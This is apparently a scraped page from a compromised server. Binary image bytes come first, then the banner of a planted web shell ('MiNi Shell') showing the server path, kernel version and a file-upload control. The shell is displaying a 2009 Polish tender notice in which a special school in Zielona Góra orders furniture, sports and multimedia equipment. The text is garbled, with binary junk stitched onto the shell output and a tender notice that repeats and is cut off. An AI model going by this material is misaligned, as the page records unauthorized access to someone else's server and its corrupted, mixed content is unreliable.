JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090702/220350-N-2009.html

<p class="kh_header"><b>Zielona Góra: zakup, dostawa  i montaż wyposażenia do Zespołu Szkół 
        Specjalnych przy ul. Piastowskiej 9 w Zielonej Górze.</b><br>
<b>Numer ogłoszenia: 220350 - 2009; data zamieszczenia: 02.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Specjalnych Nr 1 w Zielonej Górze , ul. Zachodnia 61, 65-552 Zielona Góra, woj. lubuskie, tel. 0-68 326 18 45, faks 0-68 326 18 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zss1.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup, dostawa  i montaż wyposażenia do Zespołu Szkół 
        Specjalnych przy ul. Piastowskiej 9 w Zielonej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest zakup, dostawa  i montaż wyposażenia do Zespołu Szkół 
        Specjalnych przy ul. Piastowskiej 9 w Zielonej Górze poprzez realizację następujących
         zadań:
1.1.Zadanie I - zakup, dostawa i montaż mebli szkolnych   
        Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        39.12.00.00-9- Stoły, kredensy, biurka, biblioteczki,
        39.16.00.00-1 - Meble szkolne,
1.2. Zadanie II - zakup, dostawa i montaż mebli - wyposażenie pozostałe
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        39.14.10.00-2 - Meble i wyposażenie kuchni,
        39.14.31.10-0 - Łóżka i kanapy oraz specjalne meble tapicerowane,
        39.53.10.00-3- Dywany,
1.3. Zadanie III - zakup, dostawa i montaż sprzęt drobny (pozostałe)
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        39.15.00.00-8 - Różne meble i wyposażenie,
        30.19.21.70-3 - Tablice ogłoszeń,
        39.22.43.40-3- Kosze,
1.4. Zadanie IV - zakup i dostawa sprzętu muzycznego
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        37.32.17.00-1 - Stojak na instrumenty muzyczne lub nuty,
        37.31.00.00-4 - Instrumenty muzyczne,
1.5. Zadanie V - zakup, dostawa  i montaż sprzętu RTV i multimedialnego
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        32.32.20.00-6 - Urządzenia multimedialne,
        32.32.00.00-2 - Sprzęt telewizyjny i audiowizualny,
        30.21.31.00-6 - Komputery przenośne,
        38.65.34.00-1-  Ekrany projekcyjne ,
1.6. Zadanie VI - zakup, dostawa  i montaż sprzętu rehabilitacyjnego i sportowego
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        37.40.00.00-2 - Artykuły i sprzęt sportowy,
        37.41.50.00-0 - Sprzęt lekkoatletyczny,        
1.7. Zadanie VII - zakup, dostawa  i montaż wyposażenia magazynowego-warsztatowego
         Klasyfikacja przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV):
        39.14.11.00-3 - Regały ,
        39.15.12.00-7 - Stoły robocze,
        39.13.00.00-3   -Ławki,    
2. Zakres przedmiotu zamówienia dla zadania I -zakup, dostawa i montaż mebli szkolnych:
1)      szafa biurowa z 4 półkami, o wymiarach : wys.1830 x szer.800 x gł.600  - 8 szt;
2)     regał z szafką (4 przestawne półki) o wymiarach : wys.1830 x szer.800 x gł.600,z szafką na dole i 
         1 półką z drzwiami zamykanymi na zamek -13 szt,
3)    regał z dwoma szafkami z 2 pólkami na górze i na dole z drzwiami zamykanymi na zamek o
          wymiarach:  wys.   1830xszer. 800x gł.600  -7 szt,
4)      regał z 3 szufladami na dole, góra otwarta z 3 półkami o wymiarach:  wys.   1830xszer. 800x gł.600  
         -7 szt,
5)      szafa z drzwiami zamykanymi na zamek, z 2 półkami o wymiarach :wys.1250xszer.900xgł 310 -10 szt
6)      stojak do przechowywania map na kółkach -2 szt,
7)      wieszak do zawieszania map i plansz - 4 szt,
8)       regał potrójny na plastikowe pojemniki -10 szt + 10 kpl komplet pojemników 
9)      szafka na plansze stojąca z 5 przegrodami - 36 szt,
10)    stół uczniowski 2-osobowy  nr 6 - 36 szt,
11)    stół uczniowski 2-osobowy  nr 5 - 2 szt,
12)    krzesła uczniowskie nr 5- 80 szt,
13)    stojący wieszak na ubrania jednostronny -2 szt,
14)    krzesła do stołówki - 60 szt,
15)    tablica zielona trzyskrzydłowa o wymiarach 3400x1000 - 1 szt,
16)    biurko jednoszafkowe o wymiarach wys.750xszzer.1200xgł.600 -12 szt,
17)    stolik z górna szafką na TV VIDEO - 4 szt,
18)    stolik 800mmx800mm - 8 szt,
19)    krzesło tapicerowane - 32 szt 
20)    biurko komputerowe o wymiarach wys.770xszer.620x gł.600-1 szt,
21)    regał z 4 półkami otwarty o wymiarach wys.1830x szer.1000x gł.420 -1 szt,
22)    szafa dla nauczycieli z 12 schowkami  o wymiarach wys.1830x szer.1000 x gł.420 -1 szt,
23)    szafka dla nauczycieli z 9 schowkami  o wymiarach wys.1830xszer.1000 xgł.420-1 szt.
2.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.1. do SIWZ.
2.2. Meble mają być wykonane w kolorze buk , z płyty wiórowej laminowanej .
2.3. Wymogi techniczno-eksploatacyjne :
1)    wszystkie regały i szafy wykonane z płyty meblowej musza być wyposażone w wkręcane talerzowe
         regulatory poziomo.
2)   elementy płytowe korpusu, oraz drzwi i fronty szuflad powinny być wykonane z płyty wiórowej
         dwustronnie laminowanej o grubości co najmniej 18 mm +5% 
3)    płyty robocze biurek , łączników i dostawek powinny być wykonane z płyty  wiórowej dwustronnie
         laminowanej o grubości 18mm +5%
4)     ściana tylna powinna być wykonana z płyty pilśniowej twardej lub płyty HDF grubość 3 mm,  kolor
          i rysunek powierzchni ściany tylnej powinien odpowiadać kolorowi i rysunkowi pozostałych 
         elementów korpusu .
5)   zastosowana płyta wiórowa powinna spełniać wymogi klasy higieniczności E1 wg normy PN -EN
        14322.
6)     wąskie płaszczyzny płyt wiórowych powinny być wykończone okleiną PCV o grubości min 1mm. Kolor
         i rysunek okleiny sztucznej wąskich  płaszczyzn powinien odpowiadać kolorowi i rysunkowi szerokich
         płaszczyzn płyty. Nie dopuszcza się widocznych różnic w odcieniach wąskich szerokich płaszczyzn.
7)     krawędzie elementów płytowych powinny być zaokrąglone o promieniu  zaokrąglenia min 1 mm nie
        dopuszcza się jakichkolwiek widocznych wad krawędzi elementów płytowych pod postacią
         nierówności i ubytków materiału.
8)     montaż korpusu mebla powinien odbywać się przy zastosowaniu połączeń  rozłącznych a otwory 
        widoczne po montażu mebla, łby śrub i wkrętów powinny  być wyposażone w odpowiednie zaślepki o 
       kolorze zbliżonym do koloru płyty.
9)    do montażu drzwi należy zastosować zawiasy puszkowe z regulacją  głębokości oraz siły docisku.
10)  szuflady oraz wysuwki powinny być zaopatrzone  w prowadnice rolkowe.
11)  położenie i odległości pomiędzy półkami powinno być dostosowane do znormalizowanych wymiarów 
       artykułów biurowych ( segregatory, skoroszyty). 
12)  stelaż metalowy powinien być malowany farbą proszkową
13)  na życzenie Zamawiającego należy wykonać otwory w blacie biurek na przewody komputerowe.
2.4.  Wykonawca  udzieli co najmniej  12 miesięcznej   gwarancji na dostarczony towar.
3.  Zakres przedmiotu zamówienia dla zadania II - zakup, dostawa i montaż mebli - wyposażenie
         pozostałe:
1)      dywan- wymiary 160x230 cm -4 szt,
2)     kanapa 2-osobowa z funkcją spania dł 134 x szer 90 x wys 85 -4 szt,
3)     zestaw mebli kuchennych - 1 kpl.  wykonane w kolorze buk , z płyty wiórowej laminowanej .
3.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.2. do SIWZ.
3.2. Zakup, koszty transportu oraz montaż w całości ponosi Wykonawca.
3.3.  Wykonawca  udzieli co najmniej  12 miesięcznej   gwarancji na dostarczony towar
4.  Zakres przedmiotu zamówienia dla zadania III - zakup, dostawa i montaż sprzęt drobny
          (pozostałe):
1)      suszarki na kółkach do prac plastycznych ( 15 prac)- 2 szt,
2)      ławka szatniowa z wieszakami dla 12 osób - 4 szt,
3)      tablica ogłoszeniowa ( 1215x915) - 24 szt,
4)      gabloty informacyjne aluminiowe szer.1200 x gł.900- 4 szt,
5)      godło państwowe o wymiarach wys.420x szer 350 mm- 20 szt,
6)      kosz na śmieci metalowy - 20 szt,
7)      sztalugi regulowane - 4 szt.
4.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.3. do SIWZ.
4.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar
5. Zakres przedmiotu zamówienia dla zadania IV - zakup i dostawa sprzętu muzycznego:
1)     mikrofon bezprzewodowy nagłowny - 1 szt,
2)     wibrafon -1 szt,
3)     misy tybetańskie z mieszanki metali :
-       1x 300g -1 szt,
-       2x500g -1 szt,
-       1x700g - 1 szt,
-       pałki     - 1 szt,
4) statyw do instrumentów perkusyjnych - 1 szt,
5) gitara - 1 szt.
5.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.4. do SIWZ.
5.2. Zakup, koszty transportu oraz montaż w całości ponosi Wykonawca.
5.3.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar
6. Zakres przedmiotu zamówienia dla zadania V - zakup, dostawa  i montaż sprzętu RTV 
        i multimedialnego:
1)     telewizor plazmowy 32 cala - 1 szt,
2)     odtwarzacz DVD-4 szt,
3)     radiomagnetofon - 6 szt,
4)     zestaw multimedialny - 1 kpl:
-       projektor,
-       ekran,
-       laptop,
6.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.5. do SIWZ.
6.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar
7. Zakres przedmiotu zamówienia dla zadania VI - zakup, dostawa  i montaż sprzętu
        rehabilitacyjnego i sportowego:
1)     basen rehabilitacyjny ( 200x200)  - 1 szt,
2)     poducha grucha 400l -6 szt,
3)     drabinki gimnastyczne podwójne  - 2 szt,
4)     ławeczki gimnastyczne dł. 3,5 m - 2 szt,
5)     kosz na piłki metalowy zamykany - 1 szt,
6)    stół tenisowy składany- 1 szt,
7)    stojaki i siatka do siatkówki- 1 kpl,
8)    kule lekkoatletyczne 4 kg - 2 szt  i 3 kg - 6 szt,
9)    oszczepy 600 gr- 4 szt,
10)   bloki startowe ( aluminiowe)- 2 szt,
11)   zestaw do unihokeja - 1 kpl,
12)  piłki lekarskie skóra 2 kg- 8 szt i 1 kg-10 szt,
13)  lina do pociągania 10m śr 25 mm - 10 szt,
14)  karimaty- 10 szt,
15) ergonometr wioślarski ( trenażer) R 301- 1 szt,
16) bieżnia T 103- 1 szt,
17)  wielofunkcyjne  urządzenie do ćwiczeń- 1szt,
18)  wykładzina gimnastyczna -filc gr 20 mm , dł 8 m, szer. 2m- 1 szt.
7.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.6. do SIWZ.
7.2.  Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar..
8. Zakres przedmiotu zamówienia dla zadania VII - zakup, dostawa  i montaż wyposażenia
        magazynowego-warsztatowego: 
1)     regał magazynowy-uniwersalny, ocynkowany- 6 szt,
2)     szafki ubraniowe metalowe o wymiarach wys.1840x szer.1200x gł 500 -12 szt,
3)     stół warsztatowy ślusarsko-stolarski 25x25x1,5 mm  - 6 szt,
4)     ławki na korytarze  - 6 szt,
8.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.7. do SIWZ.
8.2. Wykonawca  udzieli co najmniej  24 miesięcznej   gwarancji na dostarczony towar.
9.  Biurka i stoliki komputerowe muszą  spełniać wymagania dla stanowisk pracy  wyposażonych w 
         monitory ekranowe zgodnie z Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 01. XII .1998 
         roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe 
        ( Dz. U. Nr 148 poz. 973).
10. Meble szkolne musza spełniać wymagania określone w normach: PN- ISO 5970: 1994, PN- F- 06009: 
        2001.  
11.Sprzęt sportowy pod względem bezpieczeństwa i higieny użytkowania musi  być zgodny z
         wymaganiami ustawy z dnia 12 grudnia 2003r. o ogólnym bezpieczeństwie produktów (Dz. U. Nr 229,
         poz.2275), rozporządzeniem  Rady Ministrów z dnia 10 czerwca 1997 r. .w sprawie zasad i trybu
         opiniowania projektów urządzeń sportowych i sprzętu sportowego  oraz posiadać certyfikat lub atest
         bezpieczeństwa użytkowania oraz korzystania wydany przez jednostki certyfikujące akredytowane
         przez Polskie Centrum Badań i Certyfikacji
12. Sprzęt rehabilitacyjny musi posiadać cechę CE.
13.  Uwagi dotyczące wykonania i dostawy krzeseł i mebli:
1)     gotowe (zmontowane) meble należy dostarczyć i ustawić w pomieszczeniach jednostek wskazanych 
        przez Zamawiającego na terenie ZSS 1.
2)     w pomieszczeniach Zamawiającego dopuszcza się montaż w następującym zakresie:
-       montaż zestawów stanowiskowych, 
-       montaż uchwytów, szyb, półek ruchomych itp. 
-       zawieszanie mebli,  
14.  Wyłoniony Wykonawca  zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy 
         kserokopie atestów lub certyfikatów potwierdzone   za zgodność z oryginałem 
1)       Atesty higieniczne na płyty meblowe, obrzeża PVC, kleje oraz atesty trudnopalności dla tapicerek 
          EN- 1021- 1, EN -1021- 2, plastiku wg normy PN-88 B- 02855, sklejka spełniająca wymogi normy 
          PN- F- 06106-21994
2)      Atesty wytrzymałościowe dla krzeseł i foteli.    
15.  Zakup, koszty transportu oraz montaż wyposażenia w całości ponosi Wykonawca.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.12.00.00-9, 39.16.00.00-1, 39.14.10.00-2, 39.14.31.10-0, 39.53.10.00-3, 39.15.00.00-8, 30.19.21.70-3, 39.22.43.40-3, 37.32.17.00-1, 37.31.00.00-4, 32.32.20.00-6, 32.32.00.00-2, 30.21.31.00-6, 38.65.34.00-1, 37.40.00.00-2, 37.41.50.00-0, 39.14.11.00-3, 39.15.12.00-7, 39.13.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 25.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy pzp, spełniający warunki zawarte w art. 22 ust. 1 pkt 1-3 ustawy pzp.
2.  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą  spełnia
        - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w
         pkt 6.1.3) - 6.1.5) SIWZ.
3. 	Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania z uwzględnieniem art. 26 ust 3 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1  Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy Podwykonawcom wg załącznika Nr 2 do SIWZ;
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 3 ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie 
art. 24 ust. 1 i ust. 2 ustawy pzp wg załącznika Nr 4 do SIWZ;
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)    dokładnie wypełniona Tabela elementów rozliczeniowych   ( w polskich złotych , z dokładnością do
         dwóch miejsc po   przecinku) wg załącznika nr 5 (od 5.1 do 5.7 ) do SIWZ w   zależności od ilości
          zadań  ( dotyczy każdego zadania  oddzielnie );   
7) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
         Wykonawcy, o ile ofertę składa pełnomocnik lub przedstawiciel Wykonawcy.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
         zamiast dokumentów, o których mowa w:
2.1.pkt 6.1.5) SIWZ składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce
         zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono
        upadłości. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
        składania ofert;
3.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
          zamieszkania, nie wydaje się dokumentu o których mowa w pkt 6.2. SIWZ, zastępuje się go
          dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem
          sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego
          odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zss1.zgora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespól Szkół Specjalnych Nr 1, ul. Zachodnia 61, 65-552 Zielona Góra, faks068 326 18 45, cena 10,40 zł z opłata pocztową 17,50 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2009 godzina 09:00, miejsce: Zespół Szkół Specjalnych Nr 1, ul. Zachodnia 61, 65-552 Zielona Góra, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakup, dostawa i montaż mebli szkolnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres przedmiotu zamówienia dla zadania I -zakup, dostawa i montaż mebli szkolnych:
1)      szafa biurowa z 4 półkami, o wymiarach : wys.1830 x szer.800 x gł.600  - 8 szt;
2)     regał z szafką (4 przestawne półki) o wymiarach : wys.1830 x szer.800 x gł.600,z szafką na dole i 
         1 półką z drzwiami zamykanymi na zamek -13 szt,
3)    regał z dwoma szafkami z 2 pólkami na górze i na dole z drzwiami zamykanymi na zamek o
          wymiarach:  wys.   1830xszer. 800x gł.600  -7 szt,
4)      regał z 3 szufladami na dole, góra otwarta z 3 półkami o wymiarach:  wys.   1830xszer. 800x gł.600  
         -7 szt,
5)      szafa z drzwiami zamykanymi na zamek, z 2 półkami o wymiarach :wys.1250xszer.900xgł 310 -10 szt
6)      stojak do przechowywania map na kółkach -2 szt,
7)      wieszak do zawieszania map i plansz - 4 szt,
8)       regał potrójny na plastikowe pojemniki -10 szt + 10 kpl komplet pojemników 
9)      szafka na plansze stojąca z 5 przegrodami - 36 szt,
10)    stół uczniowski 2-osobowy  nr 6 - 36 szt,
11)    stół uczniowski 2-osobowy  nr 5 - 2 szt,
12)    krzesła uczniowskie nr 5- 80 szt,
13)    stojący wieszak na ubrania jednostronny -2 szt,
14)    krzesła do stołówki - 60 szt,
15)    tablica zielona trzyskrzydłowa o wymiarach 3400x1000 - 1 szt,
16)    biurko jednoszafkowe o wymiarach wys.750xszzer.1200xgł.600 -12 szt,
17)    stolik z górna szafką na TV/VIDEO - 4 szt,
18)    stolik 800mmx800mm - 8 szt,
19)    krzesło tapicerowane - 32 szt 
20)    biurko komputerowe o wymiarach wys.770xszer.620x gł.600-1 szt,
21)    regał z 4 półkami otwarty o wymiarach wys.1830x szer.1000x gł.420 -1 szt,
22)    szafa dla nauczycieli z 12 schowkami  o wymiarach wys.1830x szer.1000 x gł.420 -1 szt,
23)    szafka dla nauczycieli z 9 schowkami  o wymiarach wys.1830xszer.1000 xgł.420-1 szt.
1.1. Szczegółowy opis dla zadania I zawarty jest w załączniku 5.1. do SIWZ.
1.2. Meble mają być wykonane w kolorze buk , z płyty wiórowej laminowanej .
1.3. Wymogi techniczno-eksploatacyjne :
1)    wszystkie regały i szafy wykonane z płyty meblowej musza być wyposażone w wkręcane talerzowe
         regulatory poziomo.
2)   elementy płytowe korpusu, oraz drzwi i fronty szuflad powinny być wykonane z płyty wiórowej
         dwustronnie laminowanej o grubości co najmniej 18 mm +5% 
3)    płyty robocze biurek , łączników i dostawek powinny być wykonane z płyty  wiórowej dwustronnie
         laminowanej o grubości 18mm +5%
4)     ściana tylna powinna być wykonana z płyty pilśniowej twardej lub płyty HDF grubość 3 mm,  kolor
          i rysunek powierzchni ściany tylnej powinien odpowiadać kolorowi i rysunkowi pozostałych 
         elementów korpusu .
5)   zastosowana płyta wiórowa powinna spełniać wymogi klasy higieniczności E1 wg normy PN -EN
        14322.
6)     wąskie płaszczyzny płyt wiórowych powinny być wykończone okleiną PCV o grubości min 1mm. Kolor
         i rysunek okleiny sztucznej wąskich  płaszczyzn powinien odpowiadać kolorowi i rysunkowi szerokich
         płaszczyzn płyty. Nie dopuszcza się widocznych różnic w odcieniach wąskich szerokich płaszczyzn.
7)     krawędzie elementów płytowych powinny być zaokrąglone o promieniu  zaokrąglenia min 1 mm nie
        dopuszcza się jakichkolwiek widocznych wad krawędzi elementów płytowych pod postacią
         nierówności i ubytków materiału.
8)     montaż korpusu mebla powinien odbywać się przy zastosowaniu połączeń  rozłącznych a otwory 
